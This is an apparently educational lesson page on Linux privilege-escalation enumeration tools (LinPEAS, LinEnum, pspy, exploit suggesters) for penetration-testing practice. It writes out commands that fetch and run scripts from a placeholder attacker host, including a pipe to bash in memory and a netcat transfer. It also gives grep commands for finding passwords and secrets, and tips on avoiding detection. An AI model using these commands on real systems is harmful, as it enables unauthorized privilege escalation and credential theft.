Automated Enumeration Tools

beginner30 minWriteup

Using LinPEAS, LinEnum, and other automation tools

Learning Objectives

  • Use LinPEAS effectively
  • Interpret automated output
  • Use LinEnum and other tools
  • Prioritize findings

While

is essential to understand, automated tools save time and catch things you might miss. LinPEAS is the gold standard, but several tools exist for different situations.

Think of these tools as your automated detective. They run hundreds of checks in seconds, highlighting potential privilege escalation vectors. But they're noisy and might trigger alerts - know when to use them.

Detection Risk

Automated enumeration tools are LOUD. They generate massive logs and might trigger security alerts. In red team scenarios, use them only after confirming no active monitoring, or use manual techniques.

LinPEAS

LinPEAS (Linux Privilege Escalation Awesome Script) is the most comprehensive enumeration tool. It checks everything and color-codes findings by severity.

bash
1606070;"># Download and run directly (requires internet)
2curl -L https:606070;">//github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
3 
4606070;"># Download to local machine first
5wget https:606070;">//github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
6chmod +x linpeas.sh
7 
8606070;"># Transfer to target and run
9python3 -m http.server 80       606070;"># On attacker
10wget http:606070;">//attacker/linpeas.sh # On target
11chmod +x linpeas.sh
12./linpeas.sh
13 
14606070;"># Save output
15./linpeas.sh | tee linpeas_output.txt
16 
17606070;"># Run in background
18./linpeas.sh > linpeas_output.txt 2>&1 &

LinPEAS Color Coding

1Color meanings:
2RED/YELLOW on RED = Almost certainly a vector
3RED = Important, high chance of privesc
4YELLOW = Interesting, worth investigating
5GREEN = Informational
6CYAN = Users with console
7BLUE = Users without console
8 
9Look for:
10├── CVE checks (kernel, sudo, pkexec)
11├── SUID/SGID binaries
12├── Sudo permissions
13├── Interesting files
14├── Credentials in configs
15├── Writable paths
16└── Container escapes

LinPEAS Options

bash
1606070;"># Quick mode (less checks, faster)
2./linpeas.sh -q
3 
4606070;"># Stealth mode (no colors, less output)
5./linpeas.sh -s
6 
7606070;"># Skip specific checks
8./linpeas.sh -e network         606070;"># Skip network enum
9./linpeas.sh -e procs           606070;"># Skip process enum
10 
11606070;"># Run specific checks only
12./linpeas.sh -o users           606070;"># Only user enum
13./linpeas.sh -o sudo            606070;"># Only sudo checks
14 
15606070;"># Check for specific CVEs
16./linpeas.sh -o container       606070;"># Container escape checks

Parse the Output

LinPEAS output is huge. Scroll through once looking at colors, then grep for specific things: "grep -i password", "grep 95%" (high confidence findings), "grep SUID".

LinEnum

LinEnum is an older but still useful enumeration script. It's simpler than LinPEAS, which can be an advantage when you want focused output.

bash
1606070;"># Download
2wget https:606070;">//raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
3chmod +x LinEnum.sh
4 
5606070;"># Basic run
6./LinEnum.sh
7 
8606070;"># Thorough mode
9./LinEnum.sh -t
10 
11606070;"># Report mode (saves to file)
12./LinEnum.sh -r report.txt
13 
14606070;"># Export specific things
15./LinEnum.sh -e /tmp/exports/
16 
17606070;"># Search for keyword
18./LinEnum.sh -k password

LinEnum Sections

1LinEnum checks:
2├── System Information
3├── User/Group Info
4├── Environmental Info
5├── Jobs/Tasks
6├── Services
7├── Software
8├── Interesting Files
9├── Files with SUID/SGID
10└── World-writable Files
11 
12Simpler than LinPEAS, but:
13- Less comprehensive
14- No CVE checks
15- Less noise

Linux Smart Enumeration (LSE)

bash
1606070;"># Download
2wget https:606070;">//raw.githubusercontent.com/diego-treitos/linux-smart-enumeration/master/lse.sh
3chmod +x lse.sh
4 
5606070;"># Level 0: Interesting info only
6./lse.sh
7 
8606070;"># Level 1: Interesting + additional info
9./lse.sh -l1
10 
11606070;"># Level 2: Everything (verbose)
12./lse.sh -l2
13 
14606070;"># No interactive, just output
15./lse.sh -i
16 
17606070;"># Selection mode (choose what to run)
18./lse.sh -s

LSE Levels

Start with level 0 for quick wins. Only go to level 2 when you need exhaustive information. Higher levels mean more output to parse.

pspy - Process Spy

pspy monitors processes without needing root. It catches scheduled tasks and other processes that might not appear in normal enumeration.

bash
1606070;"># Download appropriate version
2606070;"># pspy64 for 64-bit, pspy32 for 32-bit
3wget https:606070;">//github.com/DominicBreuker/pspy/releases/download/v1.2.1/pspy64
4chmod +x pspy64
5 
6606070;"># Run and watch
7./pspy64
8 
9606070;"># Output shows:
10606070;"># CMD: UID=0    PID=1234  | /bin/bash /opt/backup.sh
11606070;"># CMD: UID=0    PID=1235  | /usr/bin/python3 /root/scripts/check.py
12 
13606070;"># This reveals:
14606070;"># - Cron jobs you couldn't see
15606070;"># - Hidden scheduled tasks
16606070;"># - Root processes with exploitable scripts
17 
18606070;"># Monitor file system events too
19./pspy64 -f
20 
21606070;"># Different scan intervals
22./pspy64 -i 100     606070;"># Check every 100ms

Let pspy Run

Cron jobs run on schedule. You might need to let pspy run for several minutes to catch hourly/daily tasks. Watch for patterns.

Linux Exploit Suggester

bash
1606070;"># Linux Exploit Suggester 2
2wget https:606070;">//raw.githubusercontent.com/jondonas/linux-exploit-suggester-2/master/linux-exploit-suggester-2.pl
3perl linux-exploit-suggester-2.pl
4 
5606070;"># Linux Exploit Suggester (original)
6wget https:606070;">//raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh
7chmod +x linux-exploit-suggester.sh
8./linux-exploit-suggester.sh
9 
10606070;"># Output shows kernel exploits:
11606070;"># [+] [CVE-2021-4034] PwnKit
12606070;">#     Details: https://...
13606070;">#     Exposure: probable
14606070;">#     Tags: ubuntu=...
15606070;">#     Download URL: https://...

Kernel Exploits are Risky

Kernel exploits can crash the system. Always check if there's an easier path (sudo, SUID, cron) before trying kernel exploits.

Transferring Tools

bash
1606070;"># Method 1: Python HTTP server
2606070;"># Attacker:
3python3 -m http.server 80
4606070;"># Target:
5wget http:606070;">//attacker_ip/linpeas.sh
6curl http:606070;">//attacker_ip/linpeas.sh -o linpeas.sh
7 
8606070;"># Method 2: Netcat
9606070;"># Attacker:
10nc -lvnp 4444 < linpeas.sh
11606070;"># Target:
12nc attacker_ip 4444 > linpeas.sh
13 
14606070;"># Method 3: Base64 encode
15606070;"># Attacker:
16base64 -w0 linpeas.sh
17606070;"># Target:
18echo 606070;">#a5d6ff;">"BASE64_STRING" | base64 -d > linpeas.sh
19 
20606070;"># Method 4: SCP (if you have SSH)
21scp linpeas.sh user@target:/tmp/
22 
23606070;"># Method 5: Run in memory (no file on disk)
24curl http:606070;">//attacker/linpeas.sh | bash
25606070;"># Or:
26bash <(curl -s http:606070;">//attacker/linpeas.sh)

Interpreting Results

bash
1606070;"># Common findings to prioritize:
2 
3606070;"># 1. CVE matches (highest priority)
4606070;"># LinPEAS marks these clearly
5606070;"># Example: CVE-2021-4034 PwnKit, CVE-2021-3156 Baron Samedit
6 
7606070;"># 2. SUID binaries
8606070;"># Look for:
9606070;"># - Custom binaries
10606070;"># - Unusual system binaries
11606070;"># - Binaries on GTFOBins
12 
13606070;"># 3. Sudo permissions
14606070;"># Example output:
15606070;"># (root) NOPASSWD: /usr/bin/find
16606070;"># → Check GTFOBins for find exploitation
17 
18606070;"># 4. Writable scripts in cron
19606070;"># Example:
20606070;"># /opt/scripts/backup.sh is writable
21606070;"># Cron runs it as root
22 
23606070;"># 5. Credentials
24606070;"># Search output:
25grep -i password linpeas_output.txt
26grep -i credential linpeas_output.txt
27grep -i secret linpeas_output.txt

Priority Order

1Check in this order:
21. Sudo permissions → Often instant root
32. CVE matches → Known exploits work
43. SUID binaries → Easy if on GTFOBins
54. Cron jobs → If scripts are writable
65. Credentials → Reuse for lateral movement
76. Kernel exploits → Last resort (risky)
8 
9Don't just run exploits blindly!
10Understand what the tool found.

Tool Selection

Which Tool When

1
LinPEASDefault choice - comprehensive
2
pspyWhen you suspect hidden cron jobs
3
LESWhen looking for kernel exploits
4
LinEnumWhen LinPEAS output is too noisy
5
ManualWhen stealth matters

Knowledge Check

Quick Quiz
Question 1 of 3

What does red/yellow highlighting mean in LinPEAS output?

Challenges

Tool Comparison

Challenge
🌱 beginner

Run LinPEAS and LinEnum on the same practice machine. Compare their outputs and note which findings each tool highlights that the other misses.

Need a hint? (4 available)

Key Takeaways

  • LinPEAS is the most comprehensive enumeration tool
  • Color coding helps prioritize: Red/Yellow = high priority
  • pspy catches hidden scheduled tasks
  • Always check sudo -l findings first
  • Run tools in memory to avoid leaving files
  • Automated tools are noisy - consider detection risk